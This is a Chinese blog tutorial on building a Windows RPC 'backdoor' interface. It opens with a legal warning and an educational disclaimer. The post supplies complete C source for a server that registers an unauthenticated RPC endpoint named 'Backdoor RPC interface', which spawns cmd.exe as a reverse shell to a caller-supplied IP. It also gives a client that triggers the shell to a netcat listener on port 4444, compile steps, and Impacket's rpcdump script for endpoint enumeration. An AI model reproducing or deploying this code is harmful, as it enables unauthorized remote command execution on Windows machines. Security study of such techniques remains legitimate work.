利用Windows“挖矿”Windows创建RPC攻击接口(一)

已于 2022-02-10 16:23:13 修改
阅读量3.8k 收藏 7
点赞数 2
分类专栏: 二进制安全 文章标签: rpc windows python 网络安全 信息安全
于 2022-02-10 16:05:02 首次发布
文章版权归知柯®️所有,非商业使用,转载请声明!
本文链接:https://blog.csdn.net/qq_43332010/article/details/122841622
版权

在这里插入图片描述
敬告:
《中华人民共和国刑法》第三百八十六条【破坏计算机系统罪;网络服务渎职罪】违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。
违反国家规定,对计算机系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作,后果严重的,依照前款规定处罚。
故意制作、传播计算机病毒等破坏性程序,影响计算机系统正常运行,后严重的,依照第一款规定处罚。
单位犯前三款罪的,对单位判处罚金,对其直接负责的主管人员和其他直接负责人员,依照第一款的规定处罚。

声明:本文仅供开发者与信息安全从业者学习参考,请遵守行业道德底线。

RPC技术简介:
RPC英文全称:Remote Procedure Call ,RPC技术适用在windows操作系统上,可以与Linux与MacOS系统作为客户端或服务端进行交互,开发者需要熟悉 Microsoft 接口定义语言 (MIDL) 和 MIDL 编译器。
Microsoft Remote Procedure Call (RPC) defines a powerful technology for creating distributed client/server programs. The RPC run-time stubs and libraries manage most of the processes relating to network protocols and communication.
此服务称为RPC Endpoint Mapper或epmapper
在这里插入图片描述
实验设备Windows
编译工具: Visual Studio2013
RPC实现原理:
在这里插入图片描述
在这里插入图片描述

Client 端C程序:

#include <iostream>
#include <windows.h>
#include "RemotePrivilegeCall.h"
// Links the rpcrt4.lib that exposes the WinAPI RPC functions
#pragma comment(lib, "rpcrt4.lib")

int main()
{
	RPC_STATUS status;                 // Store the RPC status
	RPC_WSTR szStringBinding = NULL;   // Store the binding string

	// Used to get a valid binding string
	status = RpcStringBindingComposeW(
		NULL,                        // UUID of the interface
		(RPC_WSTR)L"ncacn_ip_tcp",   // TCP binding 
		(RPC_WSTR)L"192.168.80.139", // Server IP address
		(RPC_WSTR)L"41337",          // Port on which the interface is listening
		NULL,                        // Network protocol to use
		&szStringBinding             // Variable in which the binding string is to be stored
	);          
   
	printf("BindingString: %s\n", szStringBinding);
	
	// Validates the binding string and retrieves a binding handle
	status = RpcBindingFromStringBindingW(
		szStringBinding,      // The binding string to validate
		&ImplicitHandle       // The variable in which is stored the binding handle
	);   
	
	RpcTryExcept{
		// Calls the remote function
		SendReverseShell(L"192.168.80.129", 4444);
	}
	RpcExcept(1){
		printf("RPCExec: %d\n", RpcExceptionCode());
	}
	RpcEndExcept

	// Libère la mémoire allouée à la chaîne de caractère binding
	status = RpcStringFreeW(&szStringBinding);

	// Libère le binding handle et déconnecte du serveur RPC
	status = RpcBindingFree(&ImplicitHandle); 
}

// Function used to allocate memory to the interface
void* __RPC_USER midl_user_allocate(size_t size){
    return malloc(size);
}

// Function used to free memory allocated to the interface
void __RPC_USER midl_user_free(void* p){
    free(p);
}

RpcStringBindingComposeW : 用于创建我们需要的绑定字符串
RpcBindingFromStringBindingW:将用于连接到端点并绑定到正确的接口
编译客户端:

cl.exe Client.cpp RemotePrivilegeCall_c.c

并在准备好 netcat 侦听器的同时启动它:

Client.exe

Server端:

#include <stdlib.h>
#include <iostream>
#include <winsock2.h>
#include <windows.h>
#include "RemotePrivilegeCall.h"
// Links the rpcrt4.lib that exposes the WinAPI RPC functions
#pragma comment(lib, "rpcrt4.lib")
// Links the ws2_32.lib which contains the socket functions
#pragma comment(lib, "ws2_32.lib")

// Function that sends the reverse shell
void SendReverseShell(wchar_t* ip_address, int port){
	printf("Sending reverse shell to: %ws:%d\n", ip_address, port);
	WSADATA wsaData;
	SOCKET s1;
	struct sockaddr_in hax;
	char ip_addr_ascii[16];
	STARTUPINFO sui;
	PROCESS_INFORMATION pi;
	sprintf(ip_addr_ascii, "%ws", ip_address );
	WSAStartup(MAKEWORD(2, 2), &wsaData);
	s1 = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);

	hax.sin_family = AF_INET;
	hax.sin_port = htons(port);
	hax.sin_addr.s_addr = inet_addr(ip_addr_ascii);

	WSAConnect(s1, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);

	memset(&sui, 0, sizeof(sui));
	sui.cb = sizeof(sui);  
	sui.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
	sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE) s1;

	LPSTR commandLine = "cmd.exe";
	CreateProcess(NULL, commandLine, NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi);
}

// Security callback function
RPC_STATUS CALLBACK SecurityCallback(RPC_IF_HANDLE Interface, void* pBindingHandle){
    return RPC_S_OK; // Whoever binds to the interface, we will allow the connection
}

int main()
{
    RPC_STATUS status; // Used to store the RPC function returns
	RPC_BINDING_VECTOR* pbindingVector = 0;

	// Specify the Rpc endpoints options
	status = RpcServerUseProtseqEpW(
		(RPC_WSTR)L"ncacn_ip_tcp",      // Endpoint to contact
		RPC_C_PROTSEQ_MAX_REQS_DEFAULT, // Default value
		(RPC_WSTR)L"41337",             // Listening port 
		NULL                            // Pointer to a security context (we don't care about that)
	);                         

	// Register the interface to the RPC runtime
	status = RpcServerRegisterIf2(
		RemotePrivilegeCall_v1_0_s_ifspec,   // Name of the interface defined in RemotePrivilegeCall.h
		NULL,                                // UUID to bind to (NULL means the one from the MIDL file)
		NULL,                                // Interface to use (NULL means the one from the MIDL file)
		RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH, // Invoke the security callback function
		RPC_C_LISTEN_MAX_CALLS_DEFAULT,      // Numbers of simultaneous connections
		(unsigned)-1,                        // Maximum size of data block received 
		SecurityCallback                     // Name of the function that acts as the security callback
	);                   

	// Register the interface to the epmapper
	status = RpcServerInqBindings(&pbindingVector);
	status = RpcEpRegisterW(
		RemotePrivilegeCall_v1_0_s_ifspec,   // Name of the interface defined in RemotePrivilegeCall.h
		pbindingVector,                      // Structure contening the binding vectors
		0,                                   // 
		(RPC_WSTR)L"Backdoor RPC interface"  // Name of the interface as exposed on port 135    
	);

	// Launch the interface
	status = RpcServerListen(
		1,                                   // Minimum number of connections
		RPC_C_LISTEN_MAX_CALLS_DEFAULT,      // Maximum number of connetions
		FALSE                                // Starts the interface immediately
	);                              
}

// Function used to allocate memory to the interface
void* __RPC_USER midl_user_allocate(size_t size){
    return malloc(size);
}

// Function used to free memory allocated to the interface
void __RPC_USER midl_user_free(void* p){
    free(p);
}

为了使 RPC 服务器正常工作,我们必须使用以下命令将服务器程序和服务器编译成一个二进制文件:

cl.exe Server.cpp RemotePrivilegeCall_s.c

运行Server.exe

Server.exe

并用 rpcdump.py 枚举 epmapper:
在这里插入图片描述

我们通过 rpcdumpy.py连接到135端口进行监听。

#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
from __future__ import division
from __future__ import print_function
import sys
import logging
import argparse

from impacket.http import AUTH_NTLM
from impacket.examples import logger
from impacket.examples.utils import parse_target
from impacket import uuid, version
from impacket.dcerpc.v5 import transport, epm
from impacket.dcerpc.v5.rpch import RPC_PROXY_INVALID_RPC_PORT_ERR, \
    RPC_PROXY_CONN_A1_0X6BA_ERR, RPC_PROXY_CONN_A1_404_ERR, \
    RPC_PROXY_RPC_OUT_DATA_404_ERR

class RPCDump:
    KNOWN_PROTOCOLS = {
        135: {'bindstr': r'ncacn_ip_tcp:%s[135]'},
        139: {'bindstr': r'ncacn_np:%s[\pipe\epmapper]'},
        443: {'bindstr': r'ncacn_http:[593,RpcProxy=%s:443]'},
        445: {'bindstr': r'ncacn_np:%s[\pipe\epmapper]'},
        593: {'bindstr': r'ncacn_http:%s'}
        }

    def __init__(self, username = '', password = '', domain='', hashes = None, port=135):
        self.__username = username
        self.__password = password
        self.__domain = domain
        self.__lmhash = ''
        self.__nthash = ''
        self.__port = port
        self.__stringbinding = '' 
        if hashes is not None:
            self.__lmhash, self.__nthash = hashes.split(':')

    def dump(self, remoteName, remoteHost):
        """Dumps the list of endpoints registered with the mapper
        listening at addr. remoteName is a valid host name or IP
        address in string format.
        """

        logging.info('Retrieving endpoint list from %s' % remoteName)

        entries = []

        self.__stringbinding = self.KNOWN_PROTOCOLS[self.__port]['bindstr'] % remoteName
        logging.debug('StringBinding %s' % self.__stringbinding)
        rpctransport = transport.DCERPCTransportFactory(self.__stringbinding)

        if self.__port in [139, 445]:
            # Setting credentials for SMB
            rpctransport.set_credentials(self.__username, self.__password, self.__domain,
                                         self.__lmhash, self.__nthash)

            # Setting remote host and port for SMB
            rpctransport.setRemoteHost(remoteHost)
            rpctransport.set_dport(self.__port)
        elif self.__port in [443]:
            # Setting credentials only for RPC Proxy, but not for the MSRPC level
            rpctransport.set_credentials(self.__username, self.__password, self.__domain,
                                         self.__lmhash, self.__nthash)

            # Usually when a server doesn't support NTLM, it also doesn't expose epmapper (nowadays
            # only RDG servers may potentially expose a epmapper via RPC Proxy).
            #
            # Also if the auth is not NTLM, there is no way to get a target
            # NetBIOS name, but epmapper ACL requires you to specify it.
            rpctransport.set_auth_type(AUTH_NTLM)
        else:
            # We don't need to authenticate to 135 and 593 ports
            pass

        try:
            entries = self.__fetchList(rpctransport)
        except Exception as e:
            #raise

            # This may contain UTF-8
            error_text = 'Protocol failed: %s' % e
            logging.critical(error_text)

            if RPC_PROXY_INVALID_RPC_PORT_ERR in error_text or \
               RPC_PROXY_RPC_OUT_DATA_404_ERR in error_text or \
               RPC_PROXY_CONN_A1_404_ERR in error_text or \
               RPC_PROXY_CONN_A1_0X6BA_ERR in error_text:
                logging.critical("This usually means the target does not allow "
                                 "to connect to its epmapper using RpcProxy.")
                return

        # Display results.

        endpoints = {}
        # Let's groups the UUIDS
        for entry in entries:
            binding = epm.PrintStringBinding(entry['tower']['Floors'])
            tmpUUID = str(entry['tower']['Floors'][0])
            if (tmpUUID in endpoints) is not True:
                endpoints[tmpUUID] = {}
                endpoints[tmpUUID]['Bindings'] = list()
            if uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmpUUID))[:18] in epm.KNOWN_UUIDS:
                endpoints[tmpUUID]['EXE'] = epm.KNOWN_UUIDS[uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmpUUID))[:18]]
            else:
                endpoints[tmpUUID]['EXE'] = 'N/A'
            endpoints[tmpUUID]['annotation'] = entry['annotation'][:-1].decode('utf-8')
            endpoints[tmpUUID]['Bindings'].append(binding)

            if tmpUUID[:36] in epm.KNOWN_PROTOCOLS:
                endpoints[tmpUUID]['Protocol'] = epm.KNOWN_PROTOCOLS[tmpUUID[:36]]
            else:
                endpoints[tmpUUID]['Protocol'] = "N/A"
            #print("Transfer Syntax: %s" % entry['tower']['Floors'][1])
     
        for endpoint in list(endpoints.keys()):
            print("Protocol: %s " % endpoints[endpoint]['Protocol'])
            print("Provider: %s " % endpoints[endpoint]['EXE'])
            print("UUID    : %s %s" % (endpoint, endpoints[endpoint]['annotation']))
            print("Bindings: ")
            for binding in endpoints[endpoint]['Bindings']:
                print("          %s" % binding)
            print("")

        if entries:
            num = len(entries)
            if 1 == num:
                logging.info('Received one endpoint.')
            else:
                logging.info('Received %d endpoints.' % num)
        else:
            logging.info('No endpoints found.')


    def __fetchList(self, rpctransport):
        dce = rpctransport.get_dce_rpc()

        dce.connect()
        #dce.set_auth_level(ntlm.NTLM_AUTH_PKT_INTEGRITY)
        #dce.bind(epm.MSRPC_UUID_PORTMAP)
        #rpcepm = epm.DCERPCEpm(dce)

        resp = epm.hept_lookup(None, dce=dce)

        dce.disconnect()

        return resp

# Process command-line arguments.
if __name__ == '__main__':
    # Init the example's logger theme
    logger.init()
    print(version.BANNER)

    parser = argparse.ArgumentParser(add_help = True, description = "Dumps the remote RPC enpoints information via epmapper.")
    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')

    group = parser.add_argument_group('connection')

    group.add_argument('-target-ip', action='store', metavar="ip address", help='IP Address of the target machine. If '
                       'ommited it will use whatever was specified as target. This is useful when target is the NetBIOS '
                       'name and you cannot resolve it')
    group.add_argument('-port', choices=['135', '139', '443', '445', '593'], nargs='?', default='135', metavar="destination port",
                       help='Destination port to connect to RPC Endpoint Mapper')

    group = parser.add_argument_group('authentication')

    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)
 
    options = parser.parse_args()

    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
        # Print the Library's installation path
        logging.debug(version.getInstallationPath())
    else:
        logging.getLogger().setLevel(logging.INFO)

    domain, username, password, remoteName = parse_target(options.target)

    if domain is None:
        domain = ''

    if password == '' and username != '' and options.hashes is None:
        from getpass import getpass
        password = getpass("Password:")

    if options.target_ip is None:
        options.target_ip = remoteName

    dumper = RPCDump(username, password, domain, options.hashes, int(options.port))

    dumper.dump(remoteName, options.target_ip)

python3 rpcdumpy.py 192.168.0.23
在这里插入图片描述

构建一个RPC接口

以下程序参考微软官方文档

参考:
https://www.codeproject.com/Articles/4837/Introduction-to-RPC-Part-1
https://csandker.io/2021/02/21/Offensive-Windows-IPC-2-RPC.html
https://docs.microsoft.com/en-us/windows/win32/rpc/rpc-start-page
https://www.coresecurity.com/sites/default/files/private-files/publications/2016/05/RicharteSolino_2006-impacketv0.9.6.0.pdf
https://github.com/SecureAuthCorp/impacket/tree/master/impacket/dcerpc/v5
https://docs.microsoft.com/en-us/windows/win32/rpc/best-rpc-programming-practices
https://docs.microsoft.com/en-us/windows/win32/rpc/using-binding-handles-and-making-rpc-calls

IT鹅
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
rpc.rar_RPC windows linux
09-14
rpc 网格的实现例子 实现linux和windows的通信
rpc2socks:漏洞利用后工具可通过Windows主机使用命名管道通过SMB上的可扩展自定义RPC协议通过Windows主机启用SOCKS隧道
03-20
rpc2socks rpc2socks是一个客户端-服务器解决方案,允许从Unix或Windows主机在Windows目标上删除并远程运行自定义RPC + SOCKS-SMB的自定义服务器应用程序。 客户端/服务器对可以用作常规的SOCKS5隧道(请参见下面的专用部分)。 客户端和服务器使用自定义可扩展协议,通过的专用命名管道进行专有通信。 协议以及客户端和服务器端都可以欢迎其他所谓的RPC命令。 rpc2socks客户端是一个Python3包和交互式脚本,使用与通过SMB协议(命名管道)在服务器端进行通信。 rpc2socks-server在C ++中作为本机,静态链接的Windows控制台应用程序(如果在编译时启用,则是服务)实现,同时支持32位和64位体系结构。 SOCKS隧道 SOCKS-through-SMB隧道是rpc2socks的主要功能。 特性: 仅SOCKS V5
PHP实现创建一个RPC服务操作示例
10-15
主要介绍了PHP实现创建一个RPC服务操作,结合实例形式分析了PHP基于socket扩展通信实现的RPC远程调用相关操作技巧,需要的朋友可以参考下
RpcEndpointMapper:Windows 72008 R2 EoP
05-22
Windows RpcEptMapper服务EoP攻击 ( )于2020年11月12日发布了Windows 7和Windows Server 2008 R2上的漏洞的,该漏洞将允许没有特权的用户升级到SYSTEM。 根据他对问题的详尽描述,并使用他的我已经编写了自己的,主要是作为学习过程。 ClémentLabro发布了一个利用漏洞获利的工具,现在我认为我可以发布我的PoC而不失礼貌。 如原始博客文章中所述,为了使用生成的DLL升级特权,必须创建适当的注册表项: $ServiceKey = "SYSTEM\CurrentControlSet\Services\RpcEptMapper\Performance" Write-Host "[*] Create 'Performance' subkey" [void] [Microsoft.Win32.Registry]::Loca
Windows C++ 使用WINAPI实现RPC通讯
最新发布
03-13
Windows C++ 使用WINAPI实现RPC通讯 如何一步步实现RPC可以看blog:https://mp.csdn.net/mp_blog/creation/editor/136684209
利用RPC远程攻击攻击WINDOWS的源程序
11-25
利用RPC远程攻击Windows Remote Procedure Call (RPC)是Windows 操作系统使用的一种远程过程调用协议。RPC提供进程间交互通信机制,允许在某台计算机上运行程序的无缝地在远程系统上执行代码。Microsoft的RPC部分在通过TCP/IP处理信息交换时存在多个远程堆缓冲区溢出问题,远程攻击者可以利用这些漏洞以本地系统权限在系统上执行任意指令。这些漏洞是由于不正确处理畸形消息所致,攻击者通过向目标发送畸形RPC DCOM请求来利用这些漏洞。
RPC漏洞攻击
04-12
一点点小技术 值得下载的呵呵 众所周知RPCRPC攻击是黑客攻之手段的
RPC在内网的攻击
m0_60571990的博客
03-09 464
RPC在内网的攻击
Windows RPC 入门
heyuye110
05-13 1372
RPC,即 Remote Procedure Call,远程过程调用。 Microsoft RPC 采用客户机/服务器(C/S)模式,客户机负责发送请求;服务器响应请求,达到通信目的。 客户机和服务器共同维护一个命令列表,发送请求时命令作为第一个参数,服务器通过命令来调用正确的处理程序,返回客户机需要的信息 【例子】 客户端程序通过RPC远程过程调用,传递一个字符串“Hello,World”给服务端, 服务端输出字符串该串“Hello,World”到命令行控制台中。 一、vs 新建空项目 winRPC;.
RPC服务远程溢出漏洞攻击
qq_43776408的博客
01-04 4216
RPC(Remote Procedure Call, 远程过程调用)是操作系统的一种消息传递功能 微软的描述为:“一种能允许分布式应用程序调用网络上不同计算机的可用服务的消息传递实用程序。在计算机的远程管理期间使用” ////////////////////////////////// 攻击RPC漏洞其实就是攻击DCOM接口 二者相关联 那什么是DCOM接口? DCOM(分布式组件对象模型...
rpc.rar_ONCRPC.S_RPCGEN WINDOWS_rpc_中间件
09-23
简单的中间件rpc程序,工程已设置好,可直接用。
windows rpc基本使用Demo
07-12
windows rpc接口使用,分为服务端和客户端,具体介绍详见blog:https://blog.csdn.net/herojuice/article/details/81015325
Potato家族本地提权细节
weixin_44216796的博客
12-28 2818
本文结合POC源码,研究Potato家族本地提权细节 Feature or vulnerability 该提权手法的前提是拥有SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限,以下用户拥有SeImpersonatePrivilege权限(而只有更高权限的账户比如SYSTEM才有SeAssignPrimaryTokenPrivilege权限): 本地管理员账户(不包括管理员组普通账户)和本地服务帐户 由SCM启动的服务 P.s. 本机测试时即使在
Windows Print Spooler CVE-2021-1675 漏洞复现
p01son的博客
07-26 562
Windows Print Spooler CVE-2021-1675 漏洞复现 Created: July 7, 2021 5:25 PM 漏洞描述 Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。 利用条件
15个完全免费的化合物寻靶计算工具
人工智能前沿分享
06-07 587
目标检测是计算机视觉任务的核心问题之一,其有效性在很大程度上取决于损失函数的定义。传统的目标检测损失函数依赖于边界框回归指标的聚合,例如预测框和真实框(即GIoU、CIoU、ICIoU等)的距离、重叠区域和纵横比。 然而,迄今为止提出和使用的方法都没有考虑到所需真实框与预测框之间不匹配的方向。这种不足导致收敛速度较慢且效率较低,因为预测框可能在训练过程中“四处游荡”并最终产生更差的模型。 在本文中,提出了一种新的损失函数SIoU,其中考虑到所需回归之间的向量角度,重新定义了惩罚指标。应用于传统的神...
手打RPC-动态注入服务
起风
04-27 499
继续上篇内容,本篇讲解服务启动时,动态注入相关的实例。 一.自定义注解 自定义的注解分为三部分: 容器启动时,自动注入配置的注解 服务端注入服务提供者的注解 消费端启动引用服务提供者的注解 @EnableRainRpc 自动扫包,引入一些默认配置,以及注入RainRpcComponentScanRegistrar,使注解了@RainProvider, @RainConsumer 的类生效。 @Target(ElementType.TYPE) @Retention(RetentionPolicy.RUNT
linux rpc漏洞溢出攻击测试,漏洞复现MS08-067经典远程溢出漏洞复现
weixin_39707201的博客
05-12 427
漏洞复现MS08-067经典远程溢出漏洞复现【漏洞复现】MS08-067经典远程溢出漏洞复现ms08-067 介绍MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。攻击利用受...
绕过卡巴斯基通过RPC控制lsass注入DLL
2ed
04-16 2745
参考国外的XPN以及3gstudent大佬的文章: https://blog.csdn.net/xiangshen1990/article/details/104872566 https://gist.github.com/xpn/93f2b75bf086baf2c388b2ddd50fb5d0 原理:正常的ssp扩展(dll)可以加载到lsass进程中去,比如kerberos验证都是通...
Black Hat USA 2021:通过无线基带-针对5G智能手机的RCE白皮书
「鸿渐之翼」的博客
10-17 6490
Over The Air Baseband Exploit: Gaining Remote Code Execution on 5G Smartphones 通过无线基带-针对5G智能手机的RCE远程代码执行攻击白皮书 致谢:腾讯科恩安全实验室 Keen Security Lab of Tencent Marco Grassi (@marcograss), Xingyu Chen (@0xKira233) 研究5G网络安全的背景: 近年来,我们看到5G网络被广泛采用,包括消费设备、物联网和关键基础设施。
microsoft windows rpc
09-25
Microsoft Windows RPC(Remote Procedure Call)是一种用于分布式计算的通信协议。它允许在网络上的计算机之间进行远程调用,使得应用程序可以通过网络调用另一个计算机上的过程。RPC提供了一种方便的方法来实现分布式系统中的通信和协作。RPCWindows系统中广泛使用,特别是在客户端/服务器模型中。 RPC的高性能模式之一是LPC(Local Procedure Call),它是Windows NT内部实现的一种通信模式。LPC主要用于Win32子系统内部的通信,比如csrss和lsass等。使用LPC进行通信可以大大提高性能。在Windows NT系统中,RPC实际上是使用LPC进行内部通信的。 在Windows系统中使用RPC时,可以通过以下步骤来配置和使用RPC: 1. 在服务端代码中,使用`RpcServerUseProtseqEp`函数来配置RPC协议序列和绑定地址。 2. 在客户端代码中,使用`RpcStringBindingCompose`函数来创建RPC绑定字符串。 3. 使用生成的RPC绑定字符串来连接到RPC服务端并进行远程调用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

IT鹅

您的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值